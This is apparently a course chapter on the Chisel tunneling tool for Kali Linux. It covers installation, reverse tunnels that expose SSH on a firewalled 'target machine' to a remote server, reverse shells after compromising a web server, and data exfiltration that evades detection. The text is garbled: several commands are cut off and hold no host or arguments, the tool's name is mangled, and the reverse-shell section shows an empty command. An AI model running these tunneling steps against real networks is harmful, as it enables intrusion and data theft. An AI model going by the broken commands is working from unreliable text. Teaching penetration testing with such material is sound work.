# Course #56: Chisel$
## Section 1: Introduction to Chisel$
Chisel$ is a unique tool designed for penetration testers and security professionals who need to facilitate network communication and bypass firewall restrictions. It operates as a fast TCP tunnel over HTTP or HTTPS. This section delves into the installation, configuration, and real-world applications of Chisel$ on Kali Linux, providing a comprehensive guide for advanced users.
### 1.1 Installation and Configuration on Kali Linux
#### Prerequisites
Before installing Chisel$, ensure that your Kali Linux is up-to-date. Open your terminal and run the following commands:
"`bash
sudo apt update
sudo apt upgrade -y
"`
#### Installation
Chisel$ can be installed from the official GitHub repository. To do this, follow these steps:
1. **Install Go**: Chisel$ is written in Go, so we need to install Go first. Use the following command to install Go:
sudo apt install golang -y
2. **Clone the Chisel Repository**: Use Git to clone the Chisel$ repository.
git clone https://github.com/jpillora/chisel.git
3. **Build Chisel**: Navigate to the cloned directory and build the binary.
cd chisel
go build
4. **Move to Usual Binaries Directory**: It’s best to move the binary to a directory that is included in your $PATH.
sudo mv chisel /usr/local/bin/
5. **Verify Installation**: You can check if Chisel$ is installed correctly by running:
chisel –version
You should see the version information of Chisel$ if the installation was successful.
#### Configuration
Chisel$ doesn’t require extensive configuration, but understanding the command options is essential for effective deployment. The basic syntax for Chisel$ is:
"`bash
chisel server -p
And to start a client connection, you would use:
"`bash
chisel client
### 1.2 Step-by-Step Usage
#### 1.2.1 Starting a Chisel$ Server
To start a Chisel$ server, use the following command:
"`bash
chisel server -p 8080
"`
This command starts the Chisel$ server on port 8080. You will see logs indicating that the server is running and listening for incoming connections.
#### 1.2.2 Starting a Client Session
On the client machine, you can connect to the Chisel$ server. Use the command:
"`bash
chisel client
"`
In this command:
– `
– `R:8081:localhost:80`: This creates a reverse tunnel from port 8081 on the server to port 80 on the client.
#### 1.2.3 Accessing Services Through the Tunnel
Once the tunnel is established, you can access services running on the client machine through the tunnel. For instance, if you have a web server running on the client machine on port 80, you can access it via:
"`bash
http://
"`
#### 1.2.4 Use Case: Bypassing Firewall Restrictions
A common scenario for using Chisel$ is bypassing restrictive firewalls. For instance, if you are in a corporate network that blocks SSH, you can use Chisel$ to tunnel SSH traffic over HTTP:
1. Start the Chisel$ server on a remote server that you control.
chisel server -p 8080
2. From the target machine (behind the firewall), run:
chisel client :8080 R:2222:localhost:22
3. Now, you can SSH into the target machine via the Chisel$ tunnel:
ssh -p 2222 user@
### 1.3 Detailed Technical Explanations
Chisel$ operates by creating TCP tunnels through HTTP/HTTPS. This enables penetration testers to circumvent firewall rules that typically block direct access to certain services. Its architecture leverages the simplicity of HTTP to traverse networks that may be heavily monitored or restricted.
#### How Tunneling Works in Chisel$
Chisel$ utilizes a client-server model where:
– **Server**: Listens for incoming connections and creates a listening port that can forward requests to specific local services.
– **Client**: Initiates a connection to the server and sets up the forwarding as instructed.
The dynamics of tunneling can be illustrated as follows:
1. **Establishing the Connection**: The client sends a connection request to the server.
2. **Creating a Tunnel**: Upon a successful connection, the server opens a listening socket that maps to the client’s specified local service.
3. **Forwarding Requests**: As requests hit the server on the specified port, they are forwarded through the tunnel to the local service, and responses are relayed back to the client.
### 1.4 Real-World Use Cases
#### 1.4.1 Remote Command Execution
Chisel$ can be a powerful tool in scenarios where remote command execution is achieved. For instance, if you gain access to a web server, you can use Chisel$ to create a reverse shell:
"`bash
chisel client
"`
Now, listening on port 9001, you can connect back and run commands remotely.
#### 1.4.2 Data Exfiltration
Using Chisel$, sensitive data can be exfiltrated from a target network. Establish a tunnel to your server and securely transfer files using the tunnel you created, thus evading detection by security systems.
### 1.5 External References
For further exploration of Chisel$ and its capabilities, consider the following references:
– [Chisel GitHub Repository](https://github.com/jpillora/chisel)
– [Understanding Tunneling Protocols](https://www.cio.com/article/243046/tunneling-protocols.html)
– [Bypassing Firewalls with Proxies and Tunnels](https://www.sans.org/white-papers/40487/)
By utilizing these resources, you can deepen your understanding of the inner workings of Chisel$ and other related networking concepts.
### 1.6 Conclusion
Chisel$ offers a robust solution for penetration testers facing restrictive network environments. Its ease of use, combined with powerful tunneling capabilities, makes it an essential tool in the ethical hacker's arsenal. As you advance through this course, you will discover more intricate uses of Chisel$ and how it can be adapted to various scenarios in penetration testing and network security.
—
Made by pablo rotem / פבלו רותם